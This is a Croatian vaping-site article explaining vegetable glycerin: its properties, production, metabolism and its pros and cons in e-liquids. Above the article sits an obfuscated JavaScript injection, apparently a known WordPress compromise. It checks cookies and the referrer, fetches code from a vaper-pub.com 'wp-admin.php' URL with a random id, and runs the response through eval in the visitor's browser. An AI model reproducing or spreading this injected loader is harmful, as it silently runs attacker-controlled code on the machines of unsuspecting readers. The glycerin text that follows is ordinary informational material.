;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Sve što trebate znati o glicerinu (VG)

Ključni sastojak sastava e-tekućine, biljni glicerin, vrlo je cijenjen od strane vapera zbog svojstva da proizvodi više pare. Međutim, potrošači nisu uvijek svjesni što je točno VG (kako ga često nazivamo) . Odgovore znanstvenog tima iz Laboratoire Sense (Phodé Group) pronaći ćete u tekstu ispod. 

Jesu li glicerin i glicerol jedno te isto? 

Biljni glicerin koji se koristi u većini e-tekućina sastoji se od 99,5% glicerola. Iz tog razloga se često kaže da su biljni glicerin i glicerol identični. Da budemo precizniji, poželjno je reći da je glicerol glavna molekula glicerina. 

Biljni glicerin koji preporučuje, na primjer, francuski AFNOR standard XP D-300-2 je USP (United States Pharmacopeia) i EP (European Pharmacopeia) farmaceutski destilirani glicerin koji sadrži najmanje 99,5% glicerola. 

Dobiva li se glicerin uvijek iz biljnih izvora? 

Glicerin u formi biljnog glicerina se koristi u sastavima e-tekućina, ali na tržištu se može naći i onaj iz životinjskih izvora. Ipak, zadržimo se na VG-u za potrebe ovog članka. 

Može li biljni glicerin sadržan u e-tekućini biti organski? 

Prema certifikacijskim kriterijima primjenjuju se različiti ekološki standardi. Kozmetički organski standard razlikuje se od ekološkog standarda za hranu. Kao takav, ekološki proizvod prema kozmetičkim specifikacijama ne zadovoljava nužno ekološke kriterije za hranu. 

To je slučaj za organski biljni glicerin koji se koristi u nekim e-tekućinama. U ovom slučaju, organski biljni glicerin je u skladu s kozmetičkim, nutritivnim ili farmaceutskim organskim specifikacijama, ali nije u skladu s ekološkim specifikacijama primjenjivim na hranu. Budući da se biljni glicerin dobiva kemijskim postupkom, ne može se smatrati organskim prema organskim kriterijima koji se primjenjuju na hranu. 

Koja su fizikalno-kemijska svojstva glicerola?

Glicerol (1,2,3-propantriol) je alkohol s molekulskom formulom C3H8O3 

Njegova linearna formula je: CH2OH—CHOH—CH2OH 

Glicerol ima molekulsku masu od 92,11 g i gustoću od 1,260 g.cm-3 (na 18°C). Glicerol je stoga gušći od vode i PG (propilen glikola). 

Glicerol ima vrelište od 290°C, temperaturu samozapaljenja od 370°C i plamište od 160°C. 

Glicerol ima viskozitet od 1,49 Pa.s na 20°C, što je ekvivalentno viskoznosti 1500 puta većoj od vode. 

Na sobnoj temperaturi, glicerol je predstavljen u obliku bistre, viskozne, bezbojne, bez mirisa, netoksične tekućine slatkog okusa. 

Zbog prisutnosti triju hidroksilnih skupina, glicerol je vrlo higroskopan. Djeluje kao vodena zamka. Glicerin se miješa sa svim omjerima vode i alkohola. 

Kako se proizvodi glicerol? 

Glicerol se može dobiti pomoću dva glavna procesa: saponifikacije masti ili transesterifikacije biljnog ulja. 

Reakcija saponifikacije omogućuje proizvodnju sapuna i glicerola iz masti i sode. Glicerol dobiven saponifikacijom je visoke čistoće (> 99%), te se stoga pretežno koristi u farmaceutskim i kozmetičkim primjenama. 

Proces proizvodnje biodizela iz sjemenki uljarica (osobito uljane repice) također se može koristiti za dobivanje glicerola na kraju procesa. To je rezultat transesterifikacije biljnog ulja, reakcije između biljnog ulja i metanola. 

Za što se koristi glicerin? 

Glicerin se široko koristi u mnogim industrijskim i potrošačkim proizvodima kao što su sapun, deterdženti, lijekovi, kozmetika, hrana, pića, boje, smole i papir. 

Ovaj spoj ima preko dvije tisuće primjena.  

Glicerin se pretežno koristi u farmaceutskoj industriji, posebice kao supstrat za antibiotike, antiseptike ili u kapsulama. Doista, ova molekula se može naći u sirupima protiv kašlja (ekspektorans), a također i u čepićima. To je hidratantno sredstvo koje poboljšava masnoću i podmazivanje farmaceutskih pripravaka. 

Glicerin je izvrsno otapalo za širok raspon aktivnih tvari i kemijskih spojeva. 

Također se intenzivno koristi u kozmetičkoj industriji. Glavni je sastojak paste za zube. Slično, ovaj spoj se široko koristi u proizvodima za njegu kože (sapuni, hidratantne kreme) i proizvodima za njegu kose (šampon). Glavne kvalitete koje pruža ova tvar su mekoća, a također i hidratacija. 

Osim toga, glicerin se nalazi u prehrani životinja i ljudi. Često se koristi kao supstrat za hranu za tekuće okuse, a također i kao zaslađivač, emulgator, zgušnjivač ili konzervans. Slično, često se uključuje u procese ekstrakcije biljnih tvari. 

Navedene su i druge aplikacije: 

Kemijska industrija: za proizvodnju kemikalija 

Duhanska industrija: za regulaciju vlage u duhanu, ali i za uklanjanje iritantnog i neugodnog zaostalog okusa 

Industrija papira i plastike: kao plastifikator  

Tekstilna industrija: u dizajnu i svojstvima pređe, posebno kao omekšivač vlakana, pređe i tkanina 

Industrija boja: koristi se kao vezivo 

Automobilska i aeronautička industrija: Za zaštitu hidrauličnih cilindara od smrzavanja na primjer ili kao antifriz 

Kako naša tijela metaboliziraju i eliminiraju glicerin? 

Metabolizacija molekule u tijelu definirana je slijedom kemijskih reakcija koje spoj prolazi nakon apsorpcije radi njegove upotrebe ili eliminacije. 

Glicerol se primarno metabolizira u jetri i bubrezima. 

60% metaboliziranog glicerola se ili pretvara u glukozu – to se naziva glukoneogeneza – ili se pretvara u energiju u stanicama kako bi se omogućilo mitohondrijsko disanje (izvor energije kroz ugradnju u Krebsov ciklus=TCA ciklus). 

40% glicerola koristi se u esterifikaciji slobodnih masnih kiselina za stvaranje triglicerida (oblik skladištenja lipida u tijelu). 

Koja je uloga biljnog glicerina u vapingu? 

Biljni glicerin je hidratantno i hidroskopsko sredstvo koje se sve više koristi zbog razvoja osobnih isparivača. 

Ovaj higroskopni element, koji može sadržavati do jedne četvrtine svog volumena u vodi, omogućuje postizanje dobre gustoće aerosola. Glicerin isparava na 290°C, a na sobnoj temperaturi (20°C) je gotovo 3 puta viskozniji od propilen glikola. 

Nedostaci 

Njegova relativno visoka točka vrelišta i visoka dinamička viskoznost znače da će e-tekućina s više glicerina biti gušća i sporije će natapati grijač te je mogućnost „dry hita“ veća kod ovakvih tekućina. 

Osim toga, VG uzrokuje brže prljanje grijača. Što je veći sadržaj biljnog glicerina, to će biti veća učestalost zamjene zavojnice kao i češće održavanje uređaja. 

Prednosti 

Zbog svojih hidratantnih svojstava i higroskopskih svojstava, vaperi s osjetljivim grlom ili oni preosjetljivi na propilen glikol preferirat će e-tekućine s više VG-a. Pored toga, oni koji žele postići najveće oblake prilikom parenja, također će vrlo često birati tekućine s visokim postotkom glicerina. 

Choose your Reaction!
Leave a Comment